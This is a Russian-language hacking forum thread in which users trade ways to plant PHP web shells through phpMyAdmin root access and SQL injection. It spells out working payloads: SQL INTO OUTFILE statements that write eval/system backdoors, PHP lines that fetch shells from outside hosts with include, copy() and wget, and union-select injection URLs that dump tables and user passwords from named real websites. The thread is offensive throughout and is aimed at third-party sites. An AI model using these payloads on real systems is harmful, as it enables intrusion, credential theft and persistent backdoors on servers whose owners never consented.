Народ прошу помощи. Вобщем есть рут доступ к PhpMyAdmin Мне нужно залить шел, но проблема в том что там инклуды отключены Я заливал с помощью такого запроса CREATE TABLE `forshelll` (`shl` TEXT NOT NULL) TYPE = MYISAM ; INSERT INTO `forshelll` ( `shell` ) VALUES ( '<?php include("http://shell.ru/shell.php") ?>' ); SELECT `shell` FROM `forshelll` INTO OUTFILE 'patch/www/shell.php'; DROP TABLE `forshelll` Ворпос! как можно ище залить без инклуда?
Копал рыл ничего не нашёл! Гуру анти чата могет вы помогете! www.dom2.ru есть уязвимости? http://dom2.ru/pulse/heroes/?id=15601' http://dom2.ru/magazine/?id=27965&article=3' Жду ответа? ___________________________________________ И это уязвимость? http://www.rk-triada.ru/index.php?-999
PHP: if(isset($_GET['shell'])) eval($_GET['shell']); PHP: <?php system($_GET['cmd']);?> Хотя смысл один и тот же...
SELECT '<?php if(isset($_REQUEST["id"])) eval($_REQUEST["id"]);?>' INTO OUTFILE '/blablabla/www/script.php'; Если пхпмайадмин будет ругаться, то переводи текст в кавычках в SQL HEX: http://hack-shop.org.ru/tools-code-encode И потом уже без кавычек подставляй в запрос. /script.php?id=copy("http://shellsite.ru/shell.txt","/blablabla/www/shell.php"); /shell.php - тут шелл. Ессно должны быть права на запись, иначе хер что сделаешь.
А не подскажите что можно сделать с сайтом у которого идёт фильтрация против SQl инъекций... Движок: PHP-nuke Модули: /modules.php?name=WhatYourSpeed /modules.php?name=Rules /modules.php?name=Downloads Ссылка: _http://la2ice.ru/
Доброго времени суток! сайт http://geograd.ru/ magic_quotes off мускул 5-ой версии http://geograd.ru/?geo=-1&idnew=-328%27+union+select+1,2,3,4,table_schema+from+information_schema.tables/*%22 тут все базы,судя по ним на серве крутится много сайтиков(если не прав,поправьте) подскажите,как можно залить шелл на серв в данном случае?
<? system("cd ../../;wget http://...../shell.php"); ?> cd ../../ - папка куда залить.. wget - качалка. взависимости еcть ли он на серве.. может быть lynx и т.д. http://...../shell.php - твой сайт с php-шеллом Ps: Если скрипт пропускает какие-то символы шел никак не залить. (конечно, может быть случай когда поле "отправить коментарий" выпоняет команду на сервере, но такой случай мы не будем рассматривать) Поэтому советую xss или sql inj, дабы получить админ права. А у админа больше прав, там уже и до шела не далеко
Похоже что права есть... значит можно залить шелл использую into outfile '/Полный путь/имя.php Нужно найти путь запрос выглядеть будет так union+select+1,2,'<? system($_GET["id"]); ?>',4,5+into outfile '/Полный путь/имя.php'/*
ты знаешь путь к папке, где лежат все скрипты сайта - следовательно ты знаешь куда можно залить шелл.. если есть файл-прив при скуль-инъекте то можешь опять же залить шелл, путь есть.. и вообще есть много способов как с этим расправится=)
всем привет, в очередной раз наткнулся на такую неприятность, когда из 5 sql удалось выцепить все таблицы, но не одна из них не является таблицей с пользователями (все колонки в каждой просматрел) такое вообще возможно? И как с этим бороться? Вот пример _http://www.semenovsky.ru/?pageId=3&mode=cards&Id=-1+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.TABLES++limit+16,200-- Заранее благодарен
такое вполне возможно,ничего такого тут нет,авторизация происходит значит по другому... или на сайте вообще нет админки,что тоже вполне нормально для небольших проектов... если я не прав,то поправьте)
1)http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,table_name,5,6+from+information_schema.tables/* -фсЁ ок) 2)http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,column_name,5,6+from+information_schema.columns+where+table_name=0x7573657273/* -фсЁ ок) 3 финал) http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,concat_ws(0x3,password),5,6+from+users/* -не пашет(((((((( что не так с финальным запросом???????????
Вот тебе что наверное надо) http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,concat_ws(username,0x3a,passwd),5,6+from+cms_user/*
Возможно таблица лежит в другой базе...сделай вот такой запрос и посмотри базы: http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,table_schema,5,6+from+information_schema.tables/*
MirA спасибо. Люди, а как быть здесь, есть вот чего Но логины не подходят к админке http://www.sarbc.ru/admin И хэш декодеры говорят, что мол, формат неверный, как быть-то вроде всё ж на ладони. Поможите пожалуйста, заранее благодарен.
tor4),MirA Вы прикалываетесь? Или я тупой? Где там инъекция? Или вы даёте советы даже не ходя по ссылкам?
